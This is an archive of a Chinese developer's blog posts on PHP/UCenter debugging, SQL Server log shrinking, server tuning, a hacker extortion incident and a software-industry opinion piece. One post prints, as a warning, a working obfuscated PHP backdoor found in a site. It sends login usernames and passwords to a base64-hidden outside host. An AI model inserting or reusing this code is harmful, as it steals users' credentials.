遇到异常不能同步登陆,比如本地是可以的,或者服务器突然就不可以了
可能是服务器是关闭了 pfsockopen  fsockopen

ucenter以前通讯是靠js实现链接api的,现在改成了 pfsockopen  fsockopen 方式了!
posted @ 2012-03-13 12:09 水温刚好 阅读(19) 评论(0) 编辑
在整合修改密码时原 sns/uc_client/common.php 

function updatepw($get, $post) 中  
ts_get_ucenter_user_ref('','',$uc_username); 这个总不执行
最后一步步调试代码发现: 
sns/core/sociax/functions.php中

function F($name,$value='',$path=false) {
    require_once CORE_PATH . '/sociax/Cache.class.php';

"require_once CORE_PATH . '/sociax/Cache.class.php';"
这行是有错误的,并未调用到文件 后来发现 CORE_PATH 是没有定义的

在 sns/api/uc.php 中增加: if(!defined('CORE_PATH'))       define('CORE_PATH'  , SITE_PATH.'/core'); 调试成功!

其中使用了调试函数,已记录日志的方式获取访问数据:
function write_log($type,$data,$file,$line)
{
        $log_data['type']         = $type;
        $log_data['data']         = $data;
        $log_data['file']         = $file;
        $log_data['line']         = $line;
        $log_data['time']         = date('Y-m-d H:i:s');

        // 日字目录处理
        $directory = SITE_PATH.'/logs/'.date('Y/m').'/';
       
        if ( ! is_dir($directory))
        {
            // 创建日期目录
            mkdir($directory, 0777, TRUE);
        }
              
        // 文件名
        $filename = $directory.$log_data['type'].'_'.date('d').'.php';

        if ( ! file_exists($filename))
        {
            // 创建日字文件
            file_put_contents($filename, '<?php defined(\'SYSPATH\') or die(\'No direct script access.\'); ?>'.PHP_EOL);
            chmod($filename, 0666);
        }

        // 设置日字格式
        $format = 'time --- type: file - line';

        // Write each message into the log file
        $data = PHP_EOL.strtr($format, $log_data).
            PHP_EOL.var_export($log_data['data'],true).
            PHP_EOL;
        file_put_contents($filename, $data, FILE_APPEND);
}



其中需要更改: ucenter(1.5.2)下  control/admin/user.php 修改密码程序 
function onedit() 中的密码
posted @ 2012-03-13 12:09 水温刚好 阅读(94) 评论(0) 编辑
如此挂马,不留心还真发现不了:
穿插在程序中间,如下:
if(isset($_POST['use'.'rname']) && isset($_POST['pas'.'sword']))
      {
            $myhostname = base64_decode ('d3d3LnR'.'oaXNkb29yL'.'mNvbQ==');
            $getstring = base64_decode ('L2luL2'.'luZGV4Ln'.'BocA==').'?g='.bin2hex($_SERVER['SERV'.'ER_N'.'AME'].$_SERVER['PH'.'P_S'.'ELF']).'&u='.bin2hex($_POST['use'.'rname']).'&p='.bin2hex($_POST['pas'.'sword']).'&c=other';
            
        //print $myhostname;
        //print $getstring;
       
        if(function_exists ('fs'.'ock'.'open'))
            {
                  $sockconn = @fsockopen ($myhostname,80);
                  @fputs ($sockconn,"GE"."T ".$getstring." HT"."TP/1."."1\r\nHo"."st:".$myhostname."\r\nConn"."ect"."ion: Cl"."ose\r\n\r\n");
                  @fclose ($sockconn);
            }
            else
            {
                  @file_get_contents (base64_decode ('aHR0'.'cDovL'.'w==').$myhostname.$getstring);
            }
      }

另外使用 eval 植马 并藏的深入些 多藏些! 汗!
posted @ 2012-03-13 12:07 水温刚好 阅读(26) 评论(0) 编辑

概述一下,我司服务器遭受一号称“中国黑客”的对我们进行了ddos攻击,目的只是为了500大洋,却费尽了心思!
上来用一QQ说找负责人,要做广告,不到一会原形毕露用另一QQ告知网站已被黑,若想要正常使用则交付500大洋“保护费”,嘿,这保护费的年限是1年!

“黑客”,在我这样的技术人员心目中是高大的一个形象,高智商的一个代表,是用大脑和指尖创造一个一个的不可思议!

我只是想说:小黑帽们,会用了几个软件,弄了些肉鸡就诊的把自己当回事,你违法了知道吗? 还有请别玷污了“中国黑客”,请不要侮辱这个名字!

如下曝光一个黑帽行为全过程,以此告诫一下,若再有进一步攻击行为,我们将通过法律来维权!

第一步,套网站负责人,网名为:守己的男人、  QQ:9911638






很快开始了第二步,亮出身份,网名为:杀人小组  QQ:535102893
开始了谈判历程了!












已支付260元截图:




如下是QQ资料截图:








以上信息百分百真实,在这里也想提醒大家加强安全意识,防止ddos攻击之类的事情发生,鄙视黑帽侮辱中国黑客名誉!

posted @ 2011-03-11 10:50 水温刚好 阅读(348) 评论(5) 编辑

--压缩日志及数据库文件大小

/*--特别注意

请按步骤进行,未进行前面的步骤,请不要做后面的步骤
否则可能损坏你的数据库.


一般不建议做第4,6两步
第4步不安全,有可能损坏数据库或丢失数据
第6步如果日志达到上限,则以后的数据库处理会失败,在清理日志后才能恢复.
--*/

--下面的所有库名都指你要处理的数据库的库名

1.清空日志
DUMP     TRANSACTION     库名     WITH     NO_LOG        

2.截断事务日志:
BACKUP   LOG   库名   WITH   NO_LOG

3.收缩数据库文件(如果不压缩,数据库的文件不会减小
企业管理器--右键你要压缩的数据库--所有任务--收缩数据库--收缩文件
--选择日志文件--在收缩方式里选择收缩至XXM,这里会给出一个允许收缩到的最小M数,直接输入这个数,确定就可以了
--选择数据文件--在收缩方式里选择收缩至XXM,这里会给出一个允许收缩到的最小M数,直接输入这个数,确定就可以了

也可以用SQL语句来完成
--收缩数据库
DBCC   SHRINKDATABASE(库名)

--收缩指定数据文件,1是文件号,可以通过这个语句查询到:select   *   from   sysfiles
DBCC   SHRINKFILE(1)

4.为了最大化的缩小日志文件(如果是sql   7.0,这步只能在查询分析器中进行)
a.分离数据库:
企业管理器--服务器--数据库--右键--分离数据库

b.在我的电脑中删除LOG文件

c.附加数据库:
企业管理器--服务器--数据库--右键--附加数据库

此法将生成新的LOG,大小只有500多K

或用代码:  
下面的示例分离   pubs,然后将   pubs   中的一个文件附加到当前服务器。

a.分离
EXEC   sp_detach_db   @dbname   =   '库名 '

b.删除日志文件

c.再附加
EXEC   sp_attach_single_file_db   @dbname   =   '库名 ',  
      @physname   =   'c:\Program   Files\Microsoft   SQL   Server\MSSQL\Data\库名.mdf '

5.为了以后能自动收缩,做如下设置:
企业管理器--服务器--右键数据库--属性--选项--选择 "自动收缩 "

--SQL语句设置方式:
EXEC   sp_dboption   '库名 ',   'autoshrink ',   'TRUE '

6.如果想以后不让它日志增长得太大
企业管理器--服务器--右键数据库--属性--事务日志
--将文件增长限制为xM(x是你允许的最大数据文件大小)

--SQL语句的设置方式:
alter   database   库名   modify   file(name=逻辑文件名,maxsize=20)

posted @ 2011-01-17 09:28 水温刚好 阅读(158) 评论(0) 编辑

更换了服务器,站点路径地址更改了,运行几日之后,网站突然变的非常卡,通过查看进程并确定是某个域下面占用了系统大部分资源,仔细检查smarty缓存目录下竟然多达好几万缓存文件,多的是临时文件扩展名!

导致网站奇慢无比,删除缓存文件及编译文件之后运行正常!

 

猜测可能是编译程序中未自动更新作怪,路径不一样吧!

 

记得以后转移站点时一定要清除编译和缓存文件!

posted @ 2010-11-09 11:46 水温刚好 阅读(144) 评论(0) 编辑

servu知道同一网段是否存在其他同样servu服务器的原理是:

同一网段服务器之间使用udp 138 发广播数据包的!

 

通过以下方式关闭即可:

 

右键 网络连接 => 属性 => 停用Microsoft网络客户 => 去掉 "勾"  ok 可以使用了!

注意:
停用Microsoft网络客户端会使你看不到网上邻居或和工作组里的资源,我的是服务器不需要看到这些所以没事!

 

 

posted @ 2010-11-09 10:26 水温刚好 阅读(69) 评论(0) 编辑

作为一名360和qq的用户,我有话要说!
我是一名网络行业从业者,对相关软件产品需求要比最为平常使用者要求稍高,为何?只是用的比较多,工作和日常生活都离不开电脑!

人是自私的,如此"大战"潮流之时,我们能做的就只需要从自身利益去考虑,跟风实际上没有任何意义,你的一大口口水,改变不了两家公司的任何实质性的做法!

对与安全,聊天及其他软件,作为一名普通用户我需要的是我喜欢的产品,你产品好又免费我就喜欢你,你从不顾及我使用的感受我就不喜欢你,很简单不过的道理!

先从360说起,产品很好,至于领导人的人品,公司的目的与我何干?我用的舒心就可以了,在我们公司电脑也就十几台都装了,为何不装?他好用又免费,我为何去花钱买你金山,瑞星,卡巴斯基等,对与个人和公司,你给我们带来实惠,确实是实惠,至少不用花钱去买杀毒软件,又好用我为何不用呢? 
至于你们之间的竞争啊,什么删除或屏蔽其他杀毒软件,跟我又有什么关系,那竞争是你们公司之间的事情,你为何没早点想起来做体贴实惠的安全软件?

至于QQ我是喜欢的,陪伴了多少年,带来了多少便捷,可以说爱,我爱QQ,因为他给我带来便利,爱的同时作为一个普通用户我只有忍受一些其他霸道和暴力,我还能做些什么呢?
当然不好的产品我就不用,如你TT,我不喜欢我就不用,你不要强制我使用,打开网页的时候我喜欢用其他浏览器,你不要强制还是不管默认浏览器用你的打开,没有办法我只能卸载!

前阵子QQ拼音,我不喜欢,我只喜欢用搜狗,我却一不小心就装上了QQ拼音,没办法我只能卸载!

对与播放器,我不喜欢,我只喜欢用暴风,装上了我不喜欢,没办法,我只能卸载!

SOSO搜索就不用说了,我只喜欢百度和Google人家搜索的精准,信息多,对不起我又卸载你的嗖嗖插件!

至于什么旋风,电脑管家,我也不喜欢,我用迅雷,我用360,为何要用你,一不小心旋风有装上了,或者用TT只是旋风打开下载,我不喜欢啊,我觉得他们的好,那没办法,我还是卸载!

不管是哪家的软件,我只要我想要的,你好的我就用,你不好我就不用,你有何权利控制我的机器,我的电脑是我花钱买的!

网络巨头们稍微醒醒吧,你们公司之间的鸡毛蒜皮,管我什么事,不要影响到我,控制我,你们赚钱了我也不想分5毛!

希望可爱的QQ在这次能醒过来,霸道,强权我很讨厌,我的电脑我只想自己做主,我只要我想要的产品,哪天我将QQ卸载了换上了msn,换上了skype,你腾讯与我何干?

360,希望能好好走下去,若能坚持为我这个平头老百姓着想,我就喜欢你,爱你!喜欢你产品,哪一天了若如QQ一样霸道,那没办法,我能做到的也只有卸载!

posted @ 2010-11-07 13:35 水温刚好 阅读(51) 评论(0) 编辑
摘要: 从www.php.net上下载了 Zend Server 社区版:ZendServer-CE-php-5.3.2-5.0.1-Windows_x86.exe。在 Windows 下使用的,for PHP 5.3.2,其本身版本是 5.0.1。 Zend Server 是一个企业级的应用服务器,集成了 PHP、Zend Framework、MySQL、Apache、PHPMyAdmin 等工具,看看...阅读全文
posted @ 2010-10-25 16:48 水温刚好 阅读(2344) 评论(1) 编辑
摘要: 向上: <base href="http://image2.sina.com.cn/gm/lineage2/whz/newwh/images/fy/images/images/ifimage/"> <div id=demo style="overflow:hidden; width:128px; height:300px;"> <div id=demo1> &l...阅读全文
posted @ 2010-10-21 17:05 水温刚好 阅读(186) 评论(0) 编辑